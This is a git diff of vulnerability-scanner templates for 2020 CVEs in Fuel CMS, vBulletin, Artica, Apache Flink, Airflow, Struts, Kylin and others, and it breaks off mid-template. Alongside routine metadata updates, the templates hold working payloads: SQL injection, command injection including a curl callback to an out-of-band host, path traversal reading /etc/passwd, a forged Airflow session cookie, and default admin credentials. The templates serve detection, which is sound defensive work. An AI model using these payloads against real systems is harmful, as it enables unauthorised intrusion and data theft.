b/http/cves/2020/CVE-2020-17463.yaml new file mode 100644 index 0000000000..e189a2de69 --- /dev/null +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -0,0 +1,66 @@ +id: CVE-2020-17463 + +info: + name: Fuel CMS 1.4.7 - SQL Injection + author: Thirukrishnan + severity: critical + description: | + FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items. + remediation: Fixed in version 115 + reference: + - https://www.exploit-db.com/exploits/48741 + - https://nvd.nist.gov/vuln/detail/CVE-2020-17463 + - http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html + - https://getfuelcms.com/ + - https://cwe.mitre.org/data/definitions/89.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-17463 + cwe-id: CWE-89 + epss-score: 0.89553 + epss-percentile: 0.98418 + cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: thedaylightstudio + product: fuel_cms + shodan-query: http.title:"fuel cms" + tags: packetstorm,cve,cve2020,sqli,fuel-cms,kev + +http: + - raw: + - | + GET /fuel/login/ HTTP/1.1 + Host: {{Hostname}} + - | + POST /fuel/login/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}} + + user_name={{username}}&password={{password}}&Login=Login&forward= + - | + @timeout: 10s + GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Referer: {{RootURL}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code_3 == 200' + - 'contains(body_1, "FUEL CMS")' + condition: and + +# digest: 4a0a0047304502203b2aba3a91ac36b321362eaf114dd6127f868d42baae0bc974cdeec8aa0567df022100f921b1bc5913c373041edcca9362ae9ba433add7f1a184efde8aad7c061161fb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 786888f7ea..f9bbcf8507 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -5,21 +5,27 @@ info: author: pussycat0x severity: critical description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.' + remediation: | + Upgrade vBulletin to a version that is not affected by CVE-2020-17496. reference: - https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed - https://nvd.nist.gov/vuln/detail/CVE-2020-17496 - https://seclists.org/fulldisclosure/2020/Aug/5 - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch + - https://cwe.mitre.org/data/definitions/78.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-17496 cwe-id: CWE-74 + epss-score: 0.97451 + epss-percentile: 0.99941 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* - epss-score: 0.97519 - tags: vbulletin,rce,kev,tenable,seclists,cve,cve2020 metadata: max-request: 1 + vendor: vbulletin + product: vbulletin + tags: vbulletin,rce,kev,tenable,seclists,cve,cve2020 http: - raw: @@ -40,5 +46,4 @@ http: status: - 200 - -# Enhanced by mp on 2022/04/27 +# digest: 4a0a00473045022100abd4766a9e0b1342f62cc2f00d516695c3b7ea80155d6ec2971b05954def3a660220127e252fee2d5cf472f4d1bea40488883137568959cb0f150c86dfd74a7ddce0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index f53fbddd1e..f8ccd31fc2 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. + remediation: | + Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2020-17505 @@ -14,11 +16,14 @@ info: cvss-score: 8.8 cve-id: CVE-2020-17505 cwe-id: CWE-78 - cpe: cpe:2.3:a:articatech:web_proxy:*:*:*:*:*:*:*:* - epss-score: 0.97122 - tags: proxy,packetstorm,cve,cve2020,rce,artica + epss-score: 0.96839 + epss-percentile: 0.9958 + cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: articatech + product: web_proxy + tags: proxy,packetstorm,cve,cve2020,rce,artica http: - raw: @@ -26,25 +31,25 @@ http: GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 Host: {{Hostname}} Accept: */* cookie-reuse: true + matchers-condition: and matchers: - type: word + part: body words: - "array(2)" - "Position: ||whoami||" - "root" condition: and - part: body - type: status status: - 200 -# Enhanced by mp on 2022/07/13 +# digest: 490a0046304402203e1fc3bf423521ce80e3b5b27a867e363e8c2105b1c681ee55dec026b1f0ccb4022036fa0750e457ade66a14b3cbd41661295f4ea9ec7fd2759ddcdd9d8d9a97ad50:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index 164c410ec8..f78f59c332 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php. + remediation: | + Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506 - http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.html @@ -14,11 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17506 cwe-id: CWE-89 - cpe: cpe:2.3:a:articatech:web_proxy:*:*:*:*:*:*:*:* - epss-score: 0.96704 - tags: cve,cve2020,artica,proxy,packetstorm + epss-score: 0.95885 + epss-percentile: 0.99264 + cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: articatech + product: web_proxy + tags: cve,cve2020,artica,proxy,packetstorm http: - method: GET @@ -27,12 +32,18 @@ http: host-redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: word words: - "artica-applianc" + - type: word + part: header + words: + - "PHPSESSID" + - type: status status: - 200 @@ -40,14 +51,9 @@ http: - 302 condition: or - - type: word - part: header - words: - - "PHPSESSID" - extractors: - type: kval kval: - "PHPSESSID" -# Enhanced by mp on 2022/04/27 +# digest: 4b0a00483046022100c5498a240278c595df00fb37242738723f7f014e744274112f56efbbf9d29af30221009d73adaa0a4a638d7d811ae04dc2860f804fa73da7db86edcbdf2e2b3aee0cec:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 92ed6e04a7..43290e3b2a 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER. + remediation: | + Upgrade Apache Flink to a version that is not affected by the vulnerability (1.5.2 or later). reference: - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518 - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261%40%3Cdev.flink.apache.org%3E @@ -16,13 +18,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2020-17518 - cwe-id: CWE-22 + cwe-id: CWE-22,CWE-23 + epss-score: 0.97464 + epss-percentile: 0.99953 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* - epss-score: 0.97462 - tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive metadata: max-request: 2 - + vendor: apache + product: flink + tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive http: - raw: @@ -35,16 +39,14 @@ http: ------WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc" - test-poc + {{randstr}} ------WebKitFormBoundaryoZ8meKnrrso89R6Y-- - - - method: GET - path: - - '{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc' + - | + GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1 matchers: - type: dsl dsl: - - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this. + - 'contains(body_2, "{{randstr}}") && status_code == 200' -# Enhanced by mp on 2022/07/13 +# digest: 4a0a004730450220783c9d0e2dd6a23c8c17ce902bc4b593be47888c53bb88ef15bafbfe0ee996f0022100d73fce20971b675e3f4810e104384482190ffe72047dab53a186b0cceaec15c5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index 0dfc5b2f05..cf712ea9d1 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion). + remediation: | + Apply the latest security patches or upgrade to a patched version of Apache Flink to mitigate the vulnerability. reference: - https://github.com/B1anda0/CVE-2020-17519 - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E @@ -16,24 +18,29 @@ info: cvss-score: 7.5 cve-id: CVE-2020-17519 cwe-id: CWE-552 + epss-score: 0.97448 + epss-percentile: 0.99938 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* - epss-score: 0.97486 - tags: cve,cve2020,apache,lfi,flink metadata: max-request: 1 + vendor: apache + product: flink + tags: cve,cve2020,apache,lfi,flink http: - method: GET path: - "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd" + matchers-condition: and matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body -# Enhanced by mp on 2022/07/13 +# digest: 4a0a00473045022016ddbd592c1a30a4c4c6e04b223f34824d3b7f61687b3fdcdcc6dc95c96cf110022100f3c1d7563bdfc3f9e485a10a928a2a9fe911dbea29002cbcf4ff42cb031e5d89:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index bfec3e29dd..c08ac5160c 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -6,23 +6,27 @@ info: severity: high description: | Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session. + remediation: Change default value for [webserver] secret_key config. reference: - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E - http://www.openwall.com/lists/oss-security/2020/12/21/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-17526 - remediation: Change default value for [webserver] secret_key config. + - https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2020-17526 cwe-id: CWE-287 + epss-score: 0.24573 + epss-percentile: 0.96094 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - epss-score: 0.02043 metadata: - max-request: 2 - fofa-query: Apache Airflow verified: true + max-request: 2 + vendor: apache + product: airflow + fofa-query: Apache Airflow tags: cve,cve2020,apache,airflow,auth-bypass http: @@ -30,15 +34,21 @@ http: - | GET /admin/ HTTP/1.1 Host: {{Hostname}} - - | GET /admin/ HTTP/1.1 Host: {{Hostname}} Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY req-condition: true + matchers-condition: and matchers: + - type: dsl + dsl: + - "contains(body_1, 'Redirecting...')" + - "status_code_1 == 302" + condition: and + - type: word part: body_2 words: @@ -49,10 +59,4 @@ http: - "Task Instances" condition: and - - type: dsl - dsl: - - "contains(body_1, 'Redirecting...')" - - "status_code_1 == 302" - condition: and - -# Enhanced by md on 2022/10/19 +# digest: 4b0a00483046022100ea82352a752469544e768c82a1a26818da0892e01b2a37fdec3081f4ca49b5680221009d0306325b1d4a43e55dd8c51885563143cd44ad943a5574ca33ffc8f1511846:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 896ab45036..1d3f27333d 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts. reference: - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html - http://jvn.jp/en/jp/JVN43969166/index.html @@ -16,10 +18,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17530 cwe-id: CWE-917 - epss-score: 0.96825 - tags: cve,cve2020,apache,rce,struts,kev,packetstorm + epss-score: 0.96946 + epss-percentile: 0.99631 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2020,apache,rce,struts,kev,packetstorm http: - method: GET @@ -29,8 +35,8 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body -# Enhanced by mp on 2022/04/27 +# digest: 4a0a00473045022100e59ba150340efdad8b7e041fa84336bd1f63ebcd1c137e466f683665cc9d4b0a02207d4a701778a9568c814503ed333a5de648b08d08dd8a3d7c8bbf9c6b3ee954b5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index 6d56aed61d..1c37ccba7d 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Z-Blog to version 1.5.3 or later to fix the open redirect vulnerability. reference: - https://github.com/zblogcn/zblogphp/issues/216 - https://github.com/zblogcn/zblogphp/issues/209 @@ -14,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-18268 cwe-id: CWE-601 - cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* epss-score: 0.00138 - tags: cve,cve2020,redirect,zblogphp,authenticated + epss-percentile: 0.49104 + cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: zblogcn + product: z-blogphp + tags: cve,cve2020,redirect,zblogphp,authenticated http: - raw: @@ -30,7 +35,6 @@ http: Connection: close btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0 - - | GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2 Host: {{Hostname}} @@ -42,4 +46,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/13 +# digest: 4a0a0047304502201c759af5d9bc5176c634c52cf598b6f30df4b7cbcae786cc948356cc34bf1d0b022100979c7998dc6859e11b48af613cad1219c8104cc60e88f1ddd52d3249e07e6b5a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index 7e88ba3fc0..cc37daa489 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + remediation: | + Upgrade to the latest version of Jeesns or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/zchuanzhao/jeesns/issues/11 - https://www.seebug.org/vuldb/ssvid-97940 @@ -14,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-19282 cwe-id: CWE-79 - cpe: cpe:2.3:a:jeesns:jeesns:*:*:*:*:*:*:*:* - epss-score: 0.00165 - tags: cve,cve2020,jeesns,xss + epss-score: 0.00135 + epss-percentile: 0.48449 + cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jeesns + product: jeesns + tags: cve,cve2020,jeesns,xss http: - method: GET @@ -27,19 +32,18 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html -# Enhanced by mp on 2022/08/15 + - type: status + status: + - 200 + +# digest: 4a0a0047304502210093434929caa6af4b1995d151e6cd6aa26cf4a732a9f4ba81c29e26f2a1b55ce6022044c1a781d5309f4a0a3daa30173c77aed3af362a675f9da1d6bae2690242b60f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index b1477d86e3..e72f2d7da7 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /newVersion component and allows attackers to execute arbitrary web scripts or HTML. + remediation: | + Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/zchuanzhao/jeesns/issues/10 - https://www.seebug.org/vuldb/ssvid-97939 @@ -14,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-19283 cwe-id: CWE-79 - cpe: cpe:2.3:a:jeesns:jeesns:*:*:*:*:*:*:*:* - epss-score: 0.00165 - tags: cve,cve2020,jeesns,xss + epss-score: 0.00135 + epss-percentile: 0.48449 + cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jeesns + product: jeesns + tags: cve,cve2020,jeesns,xss http: - method: GET @@ -27,19 +32,18 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html -# Enhanced by mp on 2022/08/15 + - type: status + status: + - 200 + +# digest: 4a0a00473045022100e0c47efa8879be3b914c01a9e855e73e1a163879729c2e9c671fae6e2adbada402200a91a6641ade76967f83824396d7f6780dbd46dc4b61244f4a00bcc3d54289fd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 8478355f42..3be2980adf 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /weibo/topic component and allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + remediation: | + Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/zchuanzhao/jeesns/issues/21 - https://www.seebug.org/vuldb/ssvid-97950 @@ -14,11 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-19295 cwe-id: CWE-79 - cpe: cpe:2.3:a:jeesns:jeesns:*:*:*:*:*:*:*:* epss-score: 0.00116 - tags: cve,cve2020,jeesns,xss + epss-percentile: 0.45113 + cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jeesns + product: jeesns + fofa-query: title="Jeesns" + tags: cve,cve2020,jeesns,xss http: - method: GET @@ -27,19 +33,21 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 + - 'JEESNS' + condition: and + case-insensitive: true - type: word part: header words: - text/html -# Enhanced by mp on 2022/08/15 + - type: status + status: + - 200 + +# digest: 4b0a0048304602210097ea59be0ad6782ff6ce9360762d586842a59ee4dd2afd765b521c1df7b68b59022100f4383ea2c602261f8cd7ace769b266d8b3863da877ff93b09d51a047e4960759:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index ab1f5acd0e..8d653528ff 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: FHEM version 6.0 suffers from a local file inclusion vulnerability. + remediation: | + Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability @@ -14,11 +16,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-19360 - cpe: cpe:2.3:a:fhem:fhem:*:*:*:*:*:*:*:* - epss-score: 0.08443 - tags: fhem,lfi,cve,cve2020 + cwe-id: CWE-22 + epss-score: 0.05605 + epss-percentile: 0.92422 + cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fhem + product: fhem + tags: fhem,lfi,cve,cve2020 http: - method: GET @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/04 +# digest: 4a0a0047304502201268a271619be55412d526dc3c9dd00f5f8f25f639a7bee0460a385f737c5c9d022100e2acd913990fbe8e367e3d364d3b438ff2b12c7110e3c1072f12a5c759e6c6bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 6956b7a939..e841af3e81 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized. + remediation: | + Upgrade Apache OFBiz to a version higher than 16.11.07 to mitigate this vulnerability. reference: - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E - https://s.apache.org/pr5u8 @@ -16,11 +18,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-1943 cwe-id: CWE-79 + epss-score: 0.97315 + epss-percentile: 0.99837 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* - epss-score: 0.97275 - tags: cve,cve2020,apache,xss,ofbiz metadata: max-request: 1 + vendor: apache + product: ofbiz + tags: cve,cve2020,apache,xss,ofbiz http: - method: GET @@ -30,17 +35,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word + part: header words: - "text/html" - part: header - type: status status: - 200 -# Enhanced by mp on 2022/08/14 +# digest: 490a00463044022000d8157b5601fb2802bc01848ddc70d15e7e51a8663fdb03bfec0f8d79506d4b02201a51bc9d899c453eb837b7e05535d261768a448396808d656d74d4cb918346c9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml new file mode 100644 index 0000000000..754391b367 --- /dev/null +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -0,0 +1,54 @@ +id: CVE-2020-19515 + +info: + name: qdPM 9.1 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. + reference: + - https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting + - http://qdpm.net/download-qdpm-free-project-management + - https://nvd.nist.gov/vuln/detail/CVE-2020-19515 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-19515 + cwe-id: CWE-79 + epss-score: 0.00102 + epss-percentile: 0.41283 + cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: qdpm + product: qdpm + shodan-query: http.favicon.hash:762074255 + tags: cve,cve2020,xss,qdpm,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php?step=database_config&db_error=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'qdPM' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + +# digest: 490a0046304402202e09c7138cfb43ba4577a935945cc146700b73df1a96dd7b21d0bb58b4533d6202202ffafcaf625e9fcd0857df8b05a03bc4cdfcfda9f7c081d13d63b035fa3535b2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index eef5f49fdf..6508ad7c79 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -6,24 +6,29 @@ info: severity: high description: | Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation. + remediation: | + Upgrade to a patched version of Apache Kylin or apply the necessary security patches provided by the vendor. reference: - https://www.sonarsource.com/blog/apache-kylin-command-injection-vulnerability/ - https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706 - https://nvd.nist.gov/vuln/detail/CVE-2020-1956 - http://www.openwall.com/lists/oss-security/2020/07/14/1 + - https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-1956 cwe-id: CWE-78 - epss-score: 0.97262 + epss-score: 0.97389 + epss-percentile: 0.99887 cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: apache + product: kylin shodan-query: http.favicon.hash:-186961397 tags: cve,cve2020,apache,kylin,rce,oast,kev - variables: username: "{{username}}:" password: "{{password}}" @@ -34,13 +39,13 @@ http: POST /kylin/api/user/authentication HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64('{{username}}:' + '{{password}}')}} - - | POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded cookie-reuse: true + 